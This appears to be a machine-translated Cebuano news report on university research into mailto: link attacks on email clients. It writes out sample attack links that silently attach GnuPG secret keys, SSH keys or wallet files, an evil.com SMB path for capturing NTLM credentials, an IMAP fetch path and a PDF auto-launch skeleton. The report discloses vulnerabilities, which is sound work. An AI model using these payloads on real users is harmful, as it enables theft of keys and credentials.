Pag-atake sa mga tiggamit sa email client gamit ang "mailto:" nga mga link

Mga tigdukiduki gikan sa Ruhr University Bochum (Germany) gisusi (PDF) pamatasan sa mga kliyente sa mail kung giproseso ang "mailto:" nga mga link nga adunay mga advanced nga parameter. Lima sa kawhaan ka mga email nga kliyente nga gisusi ang bulnerable sa usa ka pag-atake nga nagmaniobra sa resource substitution gamit ang "attach" nga parameter. Usa ka dugang nga unom ka mga email nga kliyente ang bulnerable sa usa ka PGP ug S/MIME key replacement attack, ug tulo ka mga kliyente ang bulnerable sa usa ka pag-atake aron makuha ang sulod sa mga naka-encrypt nga mensahe.

Mga link «mailto:"gigamit sa pag-automate sa pag-abli sa usa ka email client aron sa pagsulat sa usa ka sulat ngadto sa addressee nga gipiho sa link. Dugang sa adres, mahimo nimong ipiho ang dugang nga mga parameter ingon bahin sa link, sama sa hilisgutan sa sulat ug usa ka template alang sa kasagaran nga sulud. Ang gisugyot nga pag-atake nagmaniobra sa parameter nga "attach", nga nagtugot kanimo sa pag-attach sa usa ka attachment sa namugna nga mensahe.

Ang mga kliyente sa mail nga Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) ug Pegasus Mail dali nga maapektuhan sa usa ka gamay nga pag-atake nga nagtugot kanimo nga awtomatiko nga maglakip bisan unsang lokal nga payl, gipiho pinaagi sa link sama sa "mailto:?attach=path_to_file". Ang file gilakip nga wala magpakita usa ka pasidaan, busa kung wala’y espesyal nga atensyon, ang tiggamit mahimo’g dili makamatikod nga ang sulat ipadala uban ang usa ka kalakip.

Pananglitan, gamit ang usa ka link sama sa "mailto:[protektado sa email]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" pwede nimong isulod ang private keys gikan sa GnuPG ngadto sa letter. Mahimo usab nimo ipadala ang mga sulod sa crypto wallet (~/.bitcoin/wallet.dat), SSH keys (~/.ssh/id_rsa) ug bisan unsang mga file nga ma-access sa user. Dugang pa, gitugotan ka sa Thunderbird nga ilakip ang mga grupo sa mga file pinaagi sa maskara gamit ang mga konstruksyon sama sa "attach=/tmp/*.txt".

Dugang sa lokal nga mga file, ang pipila ka mga email client nagproseso sa mga link sa pagtipig sa network ug mga agianan sa IMAP server. Sa partikular, ang IBM Notes nagtugot kanimo sa pagbalhin sa usa ka file gikan sa usa ka network directory sa diha nga ang pagproseso sa mga link sama sa "attach=\\ evil.com\dummyfile", ingon man usab sa intercept NTLM authentication parameters pinaagi sa pagpadala sa usa ka link ngadto sa usa ka SMB server nga kontrolado sa tig-atake. (ang hangyo ipadala uban sa kasamtangan nga authentication parameters user).

Malampuson nga giproseso sa Thunderbird ang mga hangyo sama sa "attach=imap:///fetch>UID>/INBOX>1/", nga nagtugot kanimo sa pag-attach sa sulod gikan sa mga folder sa IMAP server. Sa samang higayon, ang mga mensahe nga nakuha gikan sa IMAP, gi-encrypt pinaagi sa OpenPGP ug S/MIME, awtomatik nga gi-decrypt sa mail client sa dili pa ipadala. Ang mga nag-develop sa Thunderbird mao ang gipahibalo mahitungod sa problema sa Pebrero ug sa isyu Thunderbird 78 ang problema naayo na (Ang Thunderbird nga mga sanga 52, 60 ug 68 nagpabilin nga huyang).

Ang mga daan nga bersyon sa Thunderbird mahuyang usab sa duha ka laing mga variant sa pag-atake sa PGP ug S/MIME nga gisugyot sa mga tigdukiduki. Sa partikular, ang Thunderbird, ingon man ang OutLook, PostBox, eM Client, MailMate ug R2Mail2, gipailalom sa usa ka yawe nga puli nga pag-atake, tungod sa kamatuoran nga ang mail client awtomatik nga nag-import ug nag-instalar sa bag-ong mga sertipiko nga gipadala sa mga mensahe sa S/MIME, nga nagtugot ang tig-atake aron organisahon ang pagpuli sa mga yawe sa publiko nga gitipigan na sa tiggamit.

Ang ikaduha nga pag-atake, diin ang Thunderbird, PostBox ug MailMate daling maapektuhan, nagmaniobra sa mga bahin sa mekanismo alang sa autosaving draft nga mga mensahe ug gitugotan, gamit ang mailto nga mga parameter, aron masugdan ang pag-decryption sa mga naka-encrypt nga mensahe o pagdugang usa ka digital nga pirma alang sa arbitraryong mga mensahe, nga adunay sunod nga pagpasa sa resulta ngadto sa IMAP server sa tig-atake. Niini nga pag-atake, ang ciphertext gipasa pinaagi sa parameter nga "lawas", ug ang "meta refresh" tag gigamit sa pagsugod sa usa ka tawag sa IMAP server sa tig-atake. Pananglitan: ' '

Aron awtomatiko nga maproseso ang "mailto:" nga mga link nga wala’y interaksyon sa gumagamit, ang espesyal nga gidisenyo nga mga dokumento sa PDF mahimong magamit - ang aksyon sa OpenAction sa PDF nagtugot kanimo nga awtomatiko nga ilunsad ang mailto handler kung magbukas sa usa ka dokumento:

%PDF-1.5
1 obj
<< /Type /Catalog /OpenAction [2 0 R] >>
endobj

2 obj
<< /Type /Action /S /URI/URI (mailto:?body=——SUGOD PGP MENSAHE——[…])>>
endobj

Pag-atake sa mga tiggamit sa email client gamit ang "mailto:" nga mga link

Source: opennet.ru

Idugang sa usa ka comment